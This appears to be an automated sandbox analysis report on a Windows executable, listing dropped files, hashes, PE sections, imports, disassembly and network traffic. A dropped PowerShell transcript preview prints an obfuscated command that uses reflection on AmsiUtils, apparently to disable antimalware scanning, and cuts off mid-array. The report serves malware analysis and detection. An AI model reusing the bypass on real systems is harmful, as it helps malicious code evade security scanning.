                                        SHA1:0B83ACEFE60D292C1A76DCEA7160D6E14D2FAA77
                                        SHA-256:04DC7F291DA8492242C8386028CC4D8DAB5ADA6DDA60A08677495495E2A6F6A8
                                        SHA-512:420D7C9467B1087D3E01BA4DFC76348DCDB97A61B5FA8A52BA167E566D4859220843EFDD64B650183BFA2E4D7E5C454FD21CF89D95F79AC13E671AAE8BC627AB
                                        Malicious:false
                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pghm4uj.4m1.ps1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlvkzbwx.aab.psm1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\Documents\20210722\PowerShell_transcript.965543.TYqX5dwv.20210722175925.txt
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):10447
                                        Entropy (8bit):4.196049168281877
                                        Encrypted:false
                                        SSDEEP:192:l2Giw/GOrwwJYZbKIDFs+xS2Giw/GOrwwJYZbKIDFs+xrL99999L:Ezw/GOrwwJYgIDFVxlzw/GOrwwJYgIDX
                                        MD5:2A0D140A36C556BC4C74DF793E698D99
                                        SHA1:299D4F22830E4FF96EC8093F77B29C93779B9E41
                                        SHA-256:A090D1E73A91DDFD68E472ADD0FE24FBCF94505500A111CEF0D4642E529DA9CB
                                        SHA-512:289F7991CD626D87AE6661820338737A85B486FA907D49696F1F62CCBE8EB707B7A22EF5AFA5FCEF18E140A19AF9E0E669F111D51FDCB6B04F54B420E51A20C3
                                        Malicious:false
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210722175925..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 965543 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,3

                                        Static File Info

                                        General

                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                        Entropy (8bit):6.055482508518817
                                        TrID:
                                        • Win64 Executable Console (202006/5) 92.64%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • VXD Driver (31/22) 0.01%
                                        File name:s2rsXUiUn8.exe
                                        File size:26624
                                        MD5:f5041ec4ce468a07ecbfd076bc0f879b
                                        SHA1:bda8cea1ec8d1cea253fc661559cd84cee2195b9
                                        SHA256:caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
                                        SHA512:4e64a727da994675aa7517f260d639691f6a94bc9c510ddde9d54f2f6e7f005b8b799eeea1d9aad1dc5128290654fa884a4aa0e397f96444914a067b8bd15c88
                                        SSDEEP:768:ko9xN+bR7ftwwAqCnv/sx3OfEbR7t6ll:nPwbR8t/3MR7AP
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..`..........'..........H................@............................................... ............................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x4014e0
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows cui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp:0x60F1F868 [Fri Jul 16 21:21:44 2021 UTC]
                                        TLS Callbacks:0x40dba0
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:eb4027891a3c2b24db6240a4f60e56ad

                                        Entrypoint Preview

                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        dec eax
                                        mov eax, dword ptr [00003FB5h]
                                        mov dword ptr [eax], 00000000h
                                        call 00007FEB90DF4A9Fh
                                        call 00007FEB90DF456Ah
                                        nop
                                        nop
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop dword ptr [eax+00h]
                                        nop word ptr [eax+eax+00000000h]
                                        dec eax
                                        sub esp, 28h
                                        call 00007FEB90DF5EACh
                                        dec eax
                                        test eax, eax
                                        sete al
                                        movzx eax, al
                                        neg eax
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        dec eax
                                        lea ecx, dword ptr [00000009h]
                                        jmp 00007FEB90DF48B9h
                                        nop dword ptr [eax+00h]
                                        ret
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        push ebp
                                        dec eax
                                        mov ebp, esp
                                        dec eax
                                        sub esp, 30h
                                        mov dword ptr [ebp+10h], ecx
                                        dec eax
                                        mov dword ptr [ebp+18h], edx
                                        call 00007FEB90DF49F1h
                                        dec eax
                                        mov eax, dword ptr [00007CA5h]
                                        call eax
                                        dec eax
                                        mov dword ptr [ebp-08h], eax
                                        dec eax
                                        mov eax, dword ptr [ebp-08h]
                                        mov edx, 00000006h
                                        dec eax
                                        mov ecx, eax
                                        dec eax
                                        mov eax, dword ptr [00007E1Ch]
                                        call eax
                                        dec eax
                                        mov eax, dword ptr [ebp-08h]
                                        mov edx, 00000000h
                                        dec eax
                                        mov ecx, eax
                                        dec eax
                                        mov eax, dword ptr [00007E07h]
                                        call eax
                                        mov edx, 00000000h
                                        dec eax
                                        lea ecx, dword ptr [00002A59h]

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x90000x7e8.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xcc500x270.vmp0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x50a00x28.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x92000x1b0.idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x1d280x1e00False0.581510416667data5.9205123354IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .data0x30000xd00x200False0.130859375data0.806747366598IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .rdata0x40000x15300x1600False0.352450284091data4.41763079769IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .pdata0x60000x2700x400False0.6533203125data5.62214281151IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .xdata0x70000x1f40x200False0.462890625data3.72511278935IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .bss0x80000x9800x0False0empty0.0IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .idata0x90000x7e80x800False0.53759765625data4.83593419899IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .CRT0xa0000x680x200False0.056640625data0.170145652003IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .tls0xb0000x100x200False0.02734375data0.0IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .vmp00xc0000xec00x1000False0.83056640625data7.19991970418IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_READ
                                        .cobf0xd0000xbde0xc00False0.638997395833data6.157131337IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                        Imports

                                        DLLImport
                                        KERNEL32.dllSleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep
                                        msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, exit, free, fwrite, malloc, memcpy, signal, strlen, strncmp, vfprintf
                                        USER32.dll

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        07/22/21-17:59:32.490432ICMP382ICMP PING Windows192.168.2.5216.58.215.238
                                        07/22/21-17:59:32.490432ICMP384ICMP PING192.168.2.5216.58.215.238
                                        07/22/21-17:59:32.532665ICMP408ICMP Echo Reply216.58.215.238192.168.2.5

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 22, 2021 17:59:33.313534021 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.354799032 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.355076075 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.381356955 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.422544956 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.423137903 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.423166037 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.423295021 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.460189104 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.502388000 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.502476931 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.502589941 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.504381895 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.545577049 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.589994907 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590024948 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590046883 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590065002 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590090036 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590112925 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590127945 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.590136051 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590157986 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590182066 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.590200901 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.590910912 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.590940952 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.591077089 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.591095924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.591895103 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.591931105 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.592003107 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.592906952 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.592931986 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.592969894 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.593012094 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.593780994 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.593811989 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.593868017 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.594769001 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.594804049 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.594871044 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.594896078 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.595767021 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.595798969 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.595869064 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.596723080 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.596754074 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.596821070 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.597675085 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.597702026 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.597737074 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.597771883 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.598653078 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.598686934 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.598737955 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.598783970 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.599637032 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.599668980 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.599728107 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.600619078 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.600646019 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.600697994 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.601591110 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.601619959 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.601681948 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.601716995 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.602497101 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.603399992 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.632543087 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.632596970 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.632664919 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.632839918 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.632945061 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.633280039 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.633335114 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.633423090 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.633924961 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.633969069 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.634002924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.634030104 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.634877920 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.634928942 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.634946108 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.634985924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.635870934 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.635915041 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.635962963 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.636019945 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.636827946 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.636868954 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.636960030 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.637772083 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.637813091 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.637886047 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.637927055 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.638742924 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.638786077 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.638839006 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.638868093 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.639755964 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.639806032 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.639887094 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.640717030 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.640755892 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.640815020 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.640866041 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.642127991 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.642189980 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.642235994 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.642297029 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.642570972 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.642601967 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.642694950 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.642770052 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.643660069 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.643718958 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.643810987 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.644587994 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.644633055 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.644762039 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.645556927 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.645661116 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.646017075 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.646060944 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.646106958 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.646156073 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.646986961 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.647033930 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.647089958 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.647176981 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.647962093 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.648006916 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.648058891 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.648087025 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.648899078 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.648940086 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.648977995 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.649005890 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.649889946 CEST44349711162.159.134.233192.168.2.5
